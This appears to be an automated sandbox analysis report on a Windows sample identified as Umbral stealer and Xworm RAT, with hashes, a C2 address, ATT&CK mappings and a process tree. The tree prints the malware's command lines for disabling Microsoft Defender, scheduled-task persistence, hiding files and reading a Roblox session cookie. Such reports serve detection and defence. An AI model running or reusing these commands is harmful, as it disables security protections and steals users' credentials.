umbral | df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0

Analysis

max time kernel
149s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-10-2024 03:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
Size

870KB
MD5

bea28a1e680f8b8053e64c8810dad71e
SHA1

8464a9aeaa3a290c9a027484a5b6e1759e9eb0e8
SHA256

df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0
SHA512

b22641529e6e642f852bc43534d49c7bc47668a432edcd3f67f4a879c77aa0e92e1ce259fb41773ba15f0a70396fe031b1073320bc95812fd3fdd2a231caa669
SSDEEP

12288:47wITbhKx7WQeu3D9FPJXOmQ+qO39WoCuwTvk83uRCS26qH3OqtwIulkyF3SkH:4EITMvRFhRRbNWoCfkYSEH3OqtwIuX

Score

10^/10

umbral xworm discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

build-what.gl.at.ply.gg:10272

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023c92-29.dat	family_umbral
behavioral2/memory/4428-46-0x00000220C8510000-0x00000220C8550000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023c91-35.dat	family_xworm
behavioral2/memory/4804-47-0x0000000000FC0000-0x0000000000FD8000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2112	powershell.exe
4236	powershell.exe
2000	powershell.exe
3428	powershell.exe
4308	powershell.exe
1532	powershell.exe
4372	powershell.exe
4580	powershell.exe
4680	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	AyoStandard.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Update Service.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Update Service.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Update Service.exe

Executes dropped EXE 6 IoCs

pid	Process
1300	AyoStandard.exe
4804	Update Service.exe
4428	Umbral.exe
4448	Umbral.exe
2604	svchost.exe
4844	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	Update Service.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
15	raw.githubusercontent.com
16	raw.githubusercontent.com
30	raw.githubusercontent.com
31	raw.githubusercontent.com
32	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4876	cmd.exe
5112	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5080	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5112	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1984	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1416	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
1416	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
1416	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
1300	AyoStandard.exe
2112	powershell.exe
2112	powershell.exe
3428	powershell.exe
3428	powershell.exe
4372	powershell.exe
4372	powershell.exe
1300	AyoStandard.exe
4580	powershell.exe
4580	powershell.exe
4580	powershell.exe
1420	powershell.exe
1420	powershell.exe
1420	powershell.exe
4680	powershell.exe
4680	powershell.exe
4308	powershell.exe
4308	powershell.exe
4680	powershell.exe
4308	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
4236	powershell.exe
4236	powershell.exe
4236	powershell.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe
4804	Update Service.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe
1300	AyoStandard.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1416	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
Token: SeDebugPrivilege	1300	AyoStandard.exe
Token: SeDebugPrivilege	4804	Update Service.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	4428	Umbral.exe
Token: SeDebugPrivilege	3428	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeIncreaseQuotaPrivilege	2216	wmic.exe
Token: SeSecurityPrivilege	2216	wmic.exe
Token: SeTakeOwnershipPrivilege	2216	wmic.exe
Token: SeLoadDriverPrivilege	2216	wmic.exe
Token: SeSystemProfilePrivilege	2216	wmic.exe
Token: SeSystemtimePrivilege	2216	wmic.exe
Token: SeProfSingleProcessPrivilege	2216	wmic.exe
Token: SeIncBasePriorityPrivilege	2216	wmic.exe
Token: SeCreatePagefilePrivilege	2216	wmic.exe
Token: SeBackupPrivilege	2216	wmic.exe
Token: SeRestorePrivilege	2216	wmic.exe
Token: SeShutdownPrivilege	2216	wmic.exe
Token: SeDebugPrivilege	2216	wmic.exe
Token: SeSystemEnvironmentPrivilege	2216	wmic.exe
Token: SeRemoteShutdownPrivilege	2216	wmic.exe
Token: SeUndockPrivilege	2216	wmic.exe
Token: SeManageVolumePrivilege	2216	wmic.exe
Token: 33	2216	wmic.exe
Token: 34	2216	wmic.exe
Token: 35	2216	wmic.exe
Token: 36	2216	wmic.exe
Token: SeIncreaseQuotaPrivilege	2216	wmic.exe
Token: SeSecurityPrivilege	2216	wmic.exe
Token: SeTakeOwnershipPrivilege	2216	wmic.exe
Token: SeLoadDriverPrivilege	2216	wmic.exe
Token: SeSystemProfilePrivilege	2216	wmic.exe
Token: SeSystemtimePrivilege	2216	wmic.exe
Token: SeProfSingleProcessPrivilege	2216	wmic.exe
Token: SeIncBasePriorityPrivilege	2216	wmic.exe
Token: SeCreatePagefilePrivilege	2216	wmic.exe
Token: SeBackupPrivilege	2216	wmic.exe
Token: SeRestorePrivilege	2216	wmic.exe
Token: SeShutdownPrivilege	2216	wmic.exe
Token: SeDebugPrivilege	2216	wmic.exe
Token: SeSystemEnvironmentPrivilege	2216	wmic.exe
Token: SeRemoteShutdownPrivilege	2216	wmic.exe
Token: SeUndockPrivilege	2216	wmic.exe
Token: SeManageVolumePrivilege	2216	wmic.exe
Token: 33	2216	wmic.exe
Token: 34	2216	wmic.exe
Token: 35	2216	wmic.exe
Token: 36	2216	wmic.exe
Token: SeIncreaseQuotaPrivilege	4888	wmic.exe
Token: SeSecurityPrivilege	4888	wmic.exe
Token: SeTakeOwnershipPrivilege	4888	wmic.exe
Token: SeLoadDriverPrivilege	4888	wmic.exe
Token: SeSystemProfilePrivilege	4888	wmic.exe
Token: SeSystemtimePrivilege	4888	wmic.exe
Token: SeProfSingleProcessPrivilege	4888	wmic.exe
Token: SeIncBasePriorityPrivilege	4888	wmic.exe
Token: SeCreatePagefilePrivilege	4888	wmic.exe
Token: SeBackupPrivilege	4888	wmic.exe
Token: SeRestorePrivilege	4888	wmic.exe
Token: SeShutdownPrivilege	4888	wmic.exe
Token: SeDebugPrivilege	4888	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4804	Update Service.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 1416 wrote to memory of 1300	1416	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe	94
PID 1416 wrote to memory of 1300	1416	df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe	94
PID 1300 wrote to memory of 2112	1300	AyoStandard.exe	98
PID 1300 wrote to memory of 2112	1300	AyoStandard.exe	98
PID 1300 wrote to memory of 4804	1300	AyoStandard.exe	100
PID 1300 wrote to memory of 4804	1300	AyoStandard.exe	100
PID 1300 wrote to memory of 4428	1300	AyoStandard.exe	101
PID 1300 wrote to memory of 4428	1300	AyoStandard.exe	101
PID 2112 wrote to memory of 4448	2112	powershell.exe	103
PID 2112 wrote to memory of 4448	2112	powershell.exe	103
PID 4428 wrote to memory of 2020	4428	Umbral.exe	104
PID 4428 wrote to memory of 2020	4428	Umbral.exe	104
PID 4428 wrote to memory of 3428	4428	Umbral.exe	106
PID 4428 wrote to memory of 3428	4428	Umbral.exe	106
PID 4428 wrote to memory of 4372	4428	Umbral.exe	108
PID 4428 wrote to memory of 4372	4428	Umbral.exe	108
PID 4428 wrote to memory of 4580	4428	Umbral.exe	111
PID 4428 wrote to memory of 4580	4428	Umbral.exe	111
PID 4428 wrote to memory of 1420	4428	Umbral.exe	114
PID 4428 wrote to memory of 1420	4428	Umbral.exe	114
PID 4428 wrote to memory of 2216	4428	Umbral.exe	116
PID 4428 wrote to memory of 2216	4428	Umbral.exe	116
PID 4428 wrote to memory of 4888	4428	Umbral.exe	118
PID 4428 wrote to memory of 4888	4428	Umbral.exe	118
PID 4428 wrote to memory of 1712	4428	Umbral.exe	120
PID 4428 wrote to memory of 1712	4428	Umbral.exe	120
PID 4428 wrote to memory of 4680	4428	Umbral.exe	122
PID 4428 wrote to memory of 4680	4428	Umbral.exe	122
PID 4804 wrote to memory of 4308	4804	Update Service.exe	124
PID 4804 wrote to memory of 4308	4804	Update Service.exe	124
PID 4428 wrote to memory of 5080	4428	Umbral.exe	126
PID 4428 wrote to memory of 5080	4428	Umbral.exe	126
PID 4804 wrote to memory of 1532	4804	Update Service.exe	128
PID 4804 wrote to memory of 1532	4804	Update Service.exe	128
PID 4804 wrote to memory of 4236	4804	Update Service.exe	130
PID 4804 wrote to memory of 4236	4804	Update Service.exe	130
PID 4804 wrote to memory of 2000	4804	Update Service.exe	133
PID 4804 wrote to memory of 2000	4804	Update Service.exe	133
PID 4428 wrote to memory of 4876	4428	Umbral.exe	136
PID 4428 wrote to memory of 4876	4428	Umbral.exe	136
PID 4876 wrote to memory of 5112	4876	cmd.exe	138
PID 4876 wrote to memory of 5112	4876	cmd.exe	138
PID 4804 wrote to memory of 1984	4804	Update Service.exe	140
PID 4804 wrote to memory of 1984	4804	Update Service.exe	140

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2020	attrib.exe

C:\Users\Admin\AppData\Local\Temp\df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe
"C:\Users\Admin\AppData\Local\Temp\df8227c17eee7cc65a3ff5244c073d4e072ee864100b2a293c0ef54e9b5b3ee0.exe"
1⤵
- Checks computer location settings
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416
- C:\Users\Admin\AppData\Local\AyoStandard.exe
  "C:\Users\Admin\AppData\Local\AyoStandard.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -command "& {Start-Process -FilePath 'C:\Windows\Temp\Umbral.exe' -Verb RunAs}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\Temp\Umbral.exe
      "C:\Windows\Temp\Umbral.exe"
      4⤵
      Executes dropped EXE
      PID:4448
- - C:\Users\Admin\AppData\Local\Update Service.exe
    "C:\Users\Admin\AppData\Local\Update Service.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Update Service.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update Service.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2000
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1984
- - C:\Users\Admin\AppData\Local\Umbral.exe
    "C:\Users\Admin\AppData\Local\Umbral.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Umbral.exe"
      4⤵
      Views/modifies file attributes
      PID:2020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Umbral.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1420
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2216
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4888
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4680
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5080
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Umbral.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:4876
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5112

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
PID:2604

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
PID:4844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\AyoStandard.exe

Filesize
9.9MB

MD5
248fbfb247664cd19804f7e69f0d9f7d

SHA1
f36e218ce7f7eaf8fc5a39d1cccc1125a1249266

SHA256
6209a4f84c4d423a5ed048595ab8fa33e8354363ea69000dcb2887e6a5264695

SHA512
6621f2c2e17b29aee8076e217647bf9efed8e2c0148d3f054cdf70232569820d600468213a9c77e4dd296cfba3b936f2dfc298538ea4d83f579194b572fb9b65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c65738617888921a153bd9b1ef516ee7

SHA1
5245e71ea3c181d76320c857b639272ac9e079b1

SHA256
4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

SHA512
2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6317adf4fbc43ea2fd68861fafd57155

SHA1
6b87c718893c83c6eed2767e8d9cbc6443e31913

SHA256
c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af

SHA512
17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
470a31aac9cf705179e47a32ce51f121

SHA1
757fc377e0198cae813c99f4d63e29d2a82ec1ec

SHA256
cf69cc666c1919e86261080d13dedb0301387c99f3360b674e211bce4071c80c

SHA512
5e667ce8238d0c2b6453b3f34757083cda67834c121ac5726e13bcd7689add07d410b67f5227bb9f9e79f6540e8579ff82e95323243905f825c9d7cf8a05cc1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjlgkjbl.fnt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Umbral.exe

Filesize
227KB

MD5
b876a9986ec4c6328ec6c702543f29c5

SHA1
7b4e1df1ea7946d1c6c065af9503d106b8310578

SHA256
cef6907644852d2c121218c464a70e125a39750a5cbd31c556d5c214a3e96750

SHA512
179332260823d94d5528692f26d22118dc87bedfe3edc2ed5ccb12c531fdfb0529bfea8662ce5dca038c3ba8048176e8df89280421af7d3f7703a14d5c035041

Download Submit
C:\Users\Admin\AppData\Local\Update Service.exe

Filesize
67KB

MD5
b60e7b4d97aa0e7568b5f1e1b0cd2315

SHA1
0a3dc1c0c807017dc115685309ea59f2aba956cd

SHA256
9f053ed5f7835f881b70f1569288c360b221431f797cd3018adcd769f02cad57

SHA512
4ed1d1ba0abad06a463a2ecc220cbee5635ed9719744aa1a70a8daaeb05eb5df56c0f2123fe7ec631fc30e40c64765d6d45ef99c0e3f6d76ab8a828a56274657

Download Submit
memory/1300-18-0x000001BC35C60000-0x000001BC36644000-memory.dmp

Filesize
9.9MB

Download
